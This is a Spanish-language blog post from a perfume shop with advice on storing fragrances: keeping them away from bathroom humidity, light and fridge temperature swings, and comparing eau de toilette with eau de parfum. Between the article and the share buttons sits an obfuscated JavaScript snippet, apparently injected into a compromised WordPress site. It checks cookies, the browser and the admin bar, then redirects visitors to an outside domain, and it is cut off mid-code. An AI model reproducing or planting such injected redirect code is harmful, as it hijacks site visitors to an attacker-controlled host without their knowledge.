Perfumes Online

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Nuestros perfumes, aquellos pequeños tesoros que guardamos con cariño y mimo, a veces no están siendo conservados en las mejores condiciones.

Hoy queremos recordaros una serie de tips o consejos que os ayudarán a conservar nuestras fragancias por más tiempo sin perder sus propiedades:

¿Sabías qué la vida media de un perfume es de unos 2 años?, pero debemos tener en cuenta que una vez abierto y al entrar aire en el envase la fragancia pierde su eficacia más rápido.

Cuántas veces habremos leído aquella tan conocida frase de “Conservar en un lugar fresco y seco”…y es que puede que a veces no caigamos en la cuenta, pero es muy importante almacenar nuestros perfumes en el lugar adecuado. Con esto queremos decir que por ejemplo, el baño no es un buen lugar para conservar nuestros perfumes ya que se trata de un rincón de la casa en el que el nivel de humedad suele ser elevado, pero si a ello le sumamos que por momentos suele alcanzar temperaturas ambientales mucho más elevadas de lo habitual no estamos consiguiendo un ambiente fresco y seco.

Otro aspecto a tener en cuenta es la luz, deberemos conservar nuestros perfumes en un lugar umbrío en el que no reciba luz, debemos evitar que reciba directamente luz halógena de una lámpara y bajo ningún concepto, luz solar directa. Una buena opción, es conservarlo en un armario o en cualquier espacio en el que esté seguro y en el que no se agite mucho el envase, también es aconsejable resguardarlo de la luz conservándolo en su cajita original.

Hay quién dice que en el lugar en el que se conservan mejor sus propiedades es en la nevera. Pero debemos tener en cuenta que los cambios bruscos de temperatura tampoco son recomendables, además de la poca practicidad de tener que sacar el perfume de la nevera con cada uso.

Como ya avanzábamos, el perfume no debe agitarse ni moverse, y por supuesto, siempre deberemos conservar el envase perfectamente cerrado y es que cuanto más reposado esté el perfume, más concentrado estará y por tanto más tiempo nos aguantará en buenas condiciones.

Como último apunte, a la hora de usar un perfume debemos tener en cuenta la cantidad de alcohol que posee cada uno, las fragancias eau de toilette son las que menos cantidad de perfume poseen y su aroma dura aproximadamente entre 3 y 5 horas en la piel, mientras que las eau de parfum suelen durar entre 7 y 9 horas, es por ello que para las eau de parfum siempre es mejor optar por el tamaño menor, y es que como dice el popular dicho, las mejores fragancias siempre vienen en envases pequeños.

¿Cómo conservabais vuestros perfumes? ¿Os hemos ayudado con algún consejo?

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone